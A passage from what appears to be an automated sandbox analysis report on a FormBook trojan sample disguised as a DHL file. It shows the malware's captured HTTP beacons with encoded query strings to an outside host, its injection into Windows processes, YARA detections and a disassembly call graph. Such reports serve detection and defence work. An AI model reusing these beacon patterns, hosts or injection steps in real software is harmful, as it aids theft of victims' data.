                                                                                    Data Ascii: FPJps=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJzfWZnNn13DkFfzD/IeEnB32zQ/WKeEreTy4xkscoKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO0OZn7hu5K4f7/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2Z4DLsRiX3Lp0HW7TCxYtU4ZQ0Z76PIyBxrpQaYANQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu8MmqcFpInCSSLUBZtWl9VprTKhZgTSWvD2RlFYmMA7+Lb5PGcmVjWkVmxFmylchMU6MdzfC5pclVzpVEPCUK6M4jzo7tIG1s1O1ak4ykjdpyQ9xtDHHQA93zk4EKjkjKhMy49kY9AeVOS1QFlhCJ7NWY+WS6g/g4IfKQ6nMXtOfp1me9SuV4isExiAMQadOxuYpDdpEc9j4BkSGpFubTofCJvLdpYJtd10AQEJ3+cC2GenvzPy0w2VUmnJZV39NWexe2UiH1QCirMz0q9LbeNXooO6lJV/pgXoootP/t8LClJ0Bg/pKgJuDs76xxp8mEJB3/aVWJ6Jof4nmtHkIlH/KY8jN+pyVZl5f9G2CT0FNl7QuENSPqexlnbd1z7d6vtPZoC+knFtqLdqVS33jhJj4f5JK1m3UuFc+glIDn+MQbeUwvRUTjLfJ2b3gUIqRnLKFq+crb6I2ceLGKWUvw13hsdGwo7rTrDG6r3waLOwS3BN29x731ATO6CO8B0CiGE7uVORxZRW2Yk9L4 [TRUNCATED]
                                                                                    Jan 7, 2025 15:35:33.330490112 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Tue, 07 Jan 2025 14:35:33 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.2.550000217.196.55.202803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:35:35.285566092 CET522OUTGET /fo8o/?FPJps=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&vVyTz=x4ZDmHH0 HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.empowermedeco.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 7, 2025 15:35:35.872658014 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Tue, 07 Jan 2025 14:35:35 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/?FPJps=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&vVyTz=x4ZDmHH0
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></htm
                                                                                    Jan 7, 2025 15:35:35.872692108 CET3INData Raw: 6c 3e 0a
                                                                                    Data Ascii: l>


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:09:31:54
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Users\user\Desktop\rDHL8350232025-2.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\rDHL8350232025-2.exe"
                                                                                    Imagebase:0x30000
                                                                                    File size:1'563'136 bytes
                                                                                    MD5 hash:6F732C7020A0EBA292610A19133B3178
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:09:31:55
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\rDHL8350232025-2.exe"
                                                                                    Imagebase:0xf80000
                                                                                    File size:46'504 bytes
                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:09:32:02
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe"
                                                                                    Imagebase:0x140000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:09:32:03
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                    Imagebase:0xda0000
                                                                                    File size:22'016 bytes
                                                                                    MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:09:32:16
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe"
                                                                                    Imagebase:0x140000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:09:32:28
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                    Imagebase:0x7ff79f9e0000
                                                                                    File size:676'768 bytes
                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:2.6%
                                                                                      Dynamic/Decrypted Code Coverage:1.1%
                                                                                      Signature Coverage:3.2%
                                                                                      Total number of Nodes:1587
                                                                                      Total number of Limit Nodes:41
                                                                                      execution_graph 97112 32de3 97113 32df0 __wsopen_s 97112->97113 97114 32e09 97113->97114 97115 72c2b ___scrt_fastfail 97113->97115 97128 33aa2 97114->97128 97118 72c47 GetOpenFileNameW 97115->97118 97120 72c96 97118->97120 97186 36b57 97120->97186 97123 72cab 97123->97123 97125 32e27 97156 344a8 97125->97156 97198 71f50 97128->97198 97131 33ae9 97204 3a6c3 97131->97204 97132 33ace 97133 36b57 22 API calls 97132->97133 97135 33ada 97133->97135 97200 337a0 97135->97200 97138 32da5 97139 71f50 __wsopen_s 97138->97139 97140 32db2 GetLongPathNameW 97139->97140 97141 36b57 22 API calls 97140->97141 97142 32dda 97141->97142 97143 33598 97142->97143 97255 3a961 97143->97255 97146 33aa2 23 API calls 97147 335b5 97146->97147 97148 335c0 97147->97148 97152 732eb 97147->97152 97260 3515f 97148->97260 97153 7330d 97152->97153 97272 4ce60 41 API calls 97152->97272 97155 335df 97155->97125 97273 34ecb 97156->97273 97159 73833 97295 a2cf9 97159->97295 97161 34ecb 94 API calls 97163 344e1 97161->97163 97162 73848 97164 7384c 97162->97164 97165 73869 97162->97165 97163->97159 97166 344e9 97163->97166 97339 34f39 97164->97339 97168 4fe0b 22 API calls 97165->97168 97169 73854 97166->97169 97170 344f5 97166->97170 97185 738ae 97168->97185 97345 9da5a 82 API calls 97169->97345 97338 3940c 136 API calls 2 library calls 97170->97338 97173 73862 97173->97165 97174 32e31 97175 73a5f 97180 73a67 97175->97180 97176 34f39 68 API calls 97176->97180 97180->97176 97348 9989b 82 API calls __wsopen_s 97180->97348 97182 39cb3 22 API calls 97182->97185 97185->97175 97185->97180 97185->97182 97321 9967e 97185->97321 97324 3a4a1 97185->97324 97332 33ff7 97185->97332 97346 995ad 42 API calls _wcslen 97185->97346 97347 a0b5a 22 API calls 97185->97347 97187 36b67 _wcslen 97186->97187 97188 74ba1 97186->97188 97191 36ba2 97187->97191 97192 36b7d 97187->97192 97189 393b2 22 API calls 97188->97189 97190 74baa 97189->97190 97190->97190 97193 4fddb 22 API calls 97191->97193 97695 36f34 22 API calls 97192->97695 97195 36bae 97193->97195 97196 4fe0b 22 API calls 97195->97196 97197 36b85 __fread_nolock 97196->97197 97197->97123 97199 33aaf GetFullPathNameW 97198->97199 97199->97131 97199->97132 97201 337ae 97200->97201 97210 393b2 97201->97210 97203 32e12 97203->97138 97205 3a6dd 97204->97205 97209 3a6d0 97204->97209 97206 4fddb 22 API calls 97205->97206 97207 3a6e7 97206->97207 97208 4fe0b 22 API calls 97207->97208 97208->97209 97209->97135 97211 393c0 97210->97211 97213 393c9 __fread_nolock 97210->97213 97211->97213 97214 3aec9 97211->97214 97213->97203 97215 3aedc 97214->97215 97219 3aed9 __fread_nolock 97214->97219 97220 4fddb 97215->97220 97217 3aee7 97230 4fe0b 97217->97230 97219->97213 97222 4fde0 97220->97222 97223 4fdfa 97222->97223 97227 4fdfc 97222->97227 97240 5ea0c 97222->97240 97247 54ead 7 API calls 2 library calls 97222->97247 97223->97217 97225 5066d 97249 532a4 RaiseException 97225->97249 97227->97225 97248 532a4 RaiseException 97227->97248 97228 5068a 97228->97217 97232 4fddb 97230->97232 97231 5ea0c ___std_exception_copy 21 API calls 97231->97232 97232->97231 97233 4fdfa 97232->97233 97235 4fdfc 97232->97235 97252 54ead 7 API calls 2 library calls 97232->97252 97233->97219 97236 5066d 97235->97236 97253 532a4 RaiseException 97235->97253 97254 532a4 RaiseException 97236->97254 97239 5068a 97239->97219 97246 63820 _abort 97240->97246 97241 6385e 97251 5f2d9 20 API calls _abort 97241->97251 97243 63849 RtlAllocateHeap 97244 6385c 97243->97244 97243->97246 97244->97222 97246->97241 97246->97243 97250 54ead 7 API calls 2 library calls 97246->97250 97247->97222 97248->97225 97249->97228 97250->97246 97251->97244 97252->97232 97253->97236 97254->97239 97256 4fe0b 22 API calls 97255->97256 97257 3a976 97256->97257 97258 4fddb 22 API calls 97257->97258 97259 335aa 97258->97259 97259->97146 97261 3516e 97260->97261 97265 3518f __fread_nolock 97260->97265 97263 4fe0b 22 API calls 97261->97263 97262 4fddb 22 API calls 97264 335cc 97262->97264 97263->97265 97266 335f3 97264->97266 97265->97262 97267 33605 97266->97267 97271 33624 __fread_nolock 97266->97271 97269 4fe0b 22 API calls 97267->97269 97268 4fddb 22 API calls 97270 3363b 97268->97270 97269->97271 97270->97155 97271->97268 97272->97152 97349 34e90 LoadLibraryA 97273->97349 97278 34ef6 LoadLibraryExW 97357 34e59 LoadLibraryA 97278->97357 97279 73ccf 97280 34f39 68 API calls 97279->97280 97283 73cd6 97280->97283 97285 34e59 3 API calls 97283->97285 97287 73cde 97285->97287 97286 34f20 97286->97287 97288 34f2c 97286->97288 97379 350f5 97287->97379 97289 34f39 68 API calls 97288->97289 97291 344cd 97289->97291 97291->97159 97291->97161 97294 73d05 97296 a2d15 97295->97296 97297 3511f 64 API calls 97296->97297 97298 a2d29 97297->97298 97529 a2e66 97298->97529 97301 350f5 40 API calls 97302 a2d56 97301->97302 97303 350f5 40 API calls 97302->97303 97304 a2d66 97303->97304 97305 350f5 40 API calls 97304->97305 97306 a2d81 97305->97306 97307 350f5 40 API calls 97306->97307 97308 a2d9c 97307->97308 97309 3511f 64 API calls 97308->97309 97310 a2db3 97309->97310 97311 5ea0c ___std_exception_copy 21 API calls 97310->97311 97312 a2dba 97311->97312 97313 5ea0c ___std_exception_copy 21 API calls 97312->97313 97314 a2dc4 97313->97314 97315 350f5 40 API calls 97314->97315 97316 a2dd8 97315->97316 97317 a28fe 27 API calls 97316->97317 97318 a2dee 97317->97318 97320 a2d3f 97318->97320 97535 a22ce 97318->97535 97320->97162 97322 4fe0b 22 API calls 97321->97322 97323 996ae __fread_nolock 97322->97323 97323->97185 97326 3a52b 97324->97326 97331 3a4b1 __fread_nolock 97324->97331 97325 4fddb 22 API calls 97327 3a4b8 97325->97327 97328 4fe0b 22 API calls 97326->97328 97329 4fddb 22 API calls 97327->97329 97330 3a4d6 97327->97330 97328->97331 97329->97330 97330->97185 97331->97325 97333 3400a 97332->97333 97335 340ae 97332->97335 97334 4fe0b 22 API calls 97333->97334 97336 3403c 97333->97336 97334->97336 97335->97185 97336->97335 97337 4fddb 22 API calls 97336->97337 97337->97336 97338->97174 97340 34f43 97339->97340 97341 34f4a 97339->97341 97342 5e678 67 API calls 97340->97342 97343 34f6a FreeLibrary 97341->97343 97344 34f59 97341->97344 97342->97341 97343->97344 97344->97169 97345->97173 97346->97185 97347->97185 97348->97180 97350 34ec6 97349->97350 97351 34ea8 GetProcAddress 97349->97351 97354 5e5eb 97350->97354 97352 34eb8 97351->97352 97352->97350 97353 34ebf FreeLibrary 97352->97353 97353->97350 97387 5e52a 97354->97387 97356 34eea 97356->97278 97356->97279 97358 34e6e GetProcAddress 97357->97358 97359 34e8d 97357->97359 97360 34e7e 97358->97360 97362 34f80 97359->97362 97360->97359 97361 34e86 FreeLibrary 97360->97361 97361->97359 97363 4fe0b 22 API calls 97362->97363 97364 34f95 97363->97364 97455 35722 97364->97455 97366 34fa1 __fread_nolock 97367 350a5 97366->97367 97368 73d1d 97366->97368 97378 34fdc 97366->97378 97458 342a2 CreateStreamOnHGlobal 97367->97458 97469 a304d 74 API calls 97368->97469 97371 73d22 97373 3511f 64 API calls 97371->97373 97372 350f5 40 API calls 97372->97378 97374 73d45 97373->97374 97375 350f5 40 API calls 97374->97375 97377 3506e ISource 97375->97377 97377->97286 97378->97371 97378->97372 97378->97377 97464 3511f 97378->97464 97380 35107 97379->97380 97381 73d70 97379->97381 97491 5e8c4 97380->97491 97384 a28fe 97512 a274e 97384->97512 97386 a2919 97386->97294 97389 5e536 ___scrt_is_nonwritable_in_current_image 97387->97389 97388 5e544 97412 5f2d9 20 API calls _abort 97388->97412 97389->97388 97392 5e574 97389->97392 97391 5e549 97413 627ec 26 API calls __wsopen_s 97391->97413 97394 5e586 97392->97394 97395 5e579 97392->97395 97404 68061 97394->97404 97414 5f2d9 20 API calls _abort 97395->97414 97398 5e58f 97399 5e595 97398->97399 97400 5e5a2 97398->97400 97415 5f2d9 20 API calls _abort 97399->97415 97416 5e5d4 LeaveCriticalSection __fread_nolock 97400->97416 97402 5e554 __wsopen_s 97402->97356 97405 6806d ___scrt_is_nonwritable_in_current_image 97404->97405 97417 62f5e EnterCriticalSection 97405->97417 97407 6807b 97418 680fb 97407->97418 97411 680ac __wsopen_s 97411->97398 97412->97391 97413->97402 97414->97402 97415->97402 97416->97402 97417->97407 97425 6811e 97418->97425 97419 68088 97431 680b7 97419->97431 97420 68177 97436 64c7d 97420->97436 97425->97419 97425->97420 97434 5918d EnterCriticalSection 97425->97434 97435 591a1 LeaveCriticalSection 97425->97435 97426 68189 97426->97419 97449 63405 11 API calls 2 library calls 97426->97449 97428 681a8 97450 5918d EnterCriticalSection 97428->97450 97454 62fa6 LeaveCriticalSection 97431->97454 97433 680be 97433->97411 97434->97425 97435->97425 97437 64c8a _abort 97436->97437 97438 64cca 97437->97438 97439 64cb5 RtlAllocateHeap 97437->97439 97451 54ead 7 API calls 2 library calls 97437->97451 97452 5f2d9 20 API calls _abort 97438->97452 97439->97437 97441 64cc8 97439->97441 97443 629c8 97441->97443 97444 629d3 RtlFreeHeap 97443->97444 97445 629fc __dosmaperr 97443->97445 97444->97445 97446 629e8 97444->97446 97445->97426 97453 5f2d9 20 API calls _abort 97446->97453 97448 629ee GetLastError 97448->97445 97449->97428 97450->97419 97451->97437 97452->97441 97453->97448 97454->97433 97456 4fddb 22 API calls 97455->97456 97457 35734 97456->97457 97457->97366 97459 342bc FindResourceExW 97458->97459 97463 342d9 97458->97463 97460 735ba LoadResource 97459->97460 97459->97463 97461 735cf SizeofResource 97460->97461 97460->97463 97462 735e3 LockResource 97461->97462 97461->97463 97462->97463 97463->97378 97465 73d90 97464->97465 97466 3512e 97464->97466 97470 5ece3 97466->97470 97469->97371 97473 5eaaa 97470->97473 97472 3513c 97472->97378 97476 5eab6 ___scrt_is_nonwritable_in_current_image 97473->97476 97474 5eac2 97486 5f2d9 20 API calls _abort 97474->97486 97476->97474 97477 5eae8 97476->97477 97488 5918d EnterCriticalSection 97477->97488 97478 5eac7 97487 627ec 26 API calls __wsopen_s 97478->97487 97481 5eaf4 97489 5ec0a 62 API calls 2 library calls 97481->97489 97483 5eb08 97490 5eb27 LeaveCriticalSection __fread_nolock 97483->97490 97485 5ead2 __wsopen_s 97485->97472 97486->97478 97487->97485 97488->97481 97489->97483 97490->97485 97494 5e8e1 97491->97494 97493 35118 97493->97384 97495 5e8ed ___scrt_is_nonwritable_in_current_image 97494->97495 97496 5e92d 97495->97496 97498 5e900 ___scrt_fastfail 97495->97498 97506 5e925 __wsopen_s 97495->97506 97509 5918d EnterCriticalSection 97496->97509 97507 5f2d9 20 API calls _abort 97498->97507 97499 5e937 97510 5e6f8 38 API calls 4 library calls 97499->97510 97502 5e91a 97508 627ec 26 API calls __wsopen_s 97502->97508 97503 5e94e 97511 5e96c LeaveCriticalSection __fread_nolock 97503->97511 97506->97493 97507->97502 97508->97506 97509->97499 97510->97503 97511->97506 97515 5e4e8 97512->97515 97514 a275d 97514->97386 97518 5e469 97515->97518 97517 5e505 97517->97514 97519 5e478 97518->97519 97521 5e48c 97518->97521 97526 5f2d9 20 API calls _abort 97519->97526 97525 5e488 __alldvrm 97521->97525 97528 6333f 11 API calls 2 library calls 97521->97528 97522 5e47d 97527 627ec 26 API calls __wsopen_s 97522->97527 97525->97517 97526->97522 97527->97525 97528->97525 97534 a2e7a 97529->97534 97530 a2d3b 97530->97301 97530->97320 97531 350f5 40 API calls 97531->97534 97532 a28fe 27 API calls 97532->97534 97533 3511f 64 API calls 97533->97534 97534->97530 97534->97531 97534->97532 97534->97533 97536 a22e7 97535->97536 97537 a22d9 97535->97537 97539 a232c 97536->97539 97540 5e5eb 29 API calls 97536->97540 97563 a22f0 97536->97563 97538 5e5eb 29 API calls 97537->97538 97538->97536 97564 a2557 40 API calls __fread_nolock 97539->97564 97541 a2311 97540->97541 97541->97539 97543 a231a 97541->97543 97543->97563 97572 5e678 97543->97572 97544 a2370 97545 a2374 97544->97545 97546 a2395 97544->97546 97549 a2381 97545->97549 97551 5e678 67 API calls 97545->97551 97565 a2171 97546->97565 97552 5e678 67 API calls 97549->97552 97549->97563 97550 a239d 97553 a23c3 97550->97553 97554 a23a3 97550->97554 97551->97549 97552->97563 97585 a23f3 74 API calls 97553->97585 97556 a23b0 97554->97556 97557 5e678 67 API calls 97554->97557 97558 5e678 67 API calls 97556->97558 97556->97563 97557->97556 97558->97563 97559 a23de 97562 5e678 67 API calls 97559->97562 97559->97563 97560 a23ca 97560->97559 97561 5e678 67 API calls 97560->97561 97561->97559 97562->97563 97563->97320 97564->97544 97566 5ea0c ___std_exception_copy 21 API calls 97565->97566 97567 a217f 97566->97567 97568 5ea0c ___std_exception_copy 21 API calls 97567->97568 97569 a2190 97568->97569 97570 5ea0c ___std_exception_copy 21 API calls 97569->97570 97571 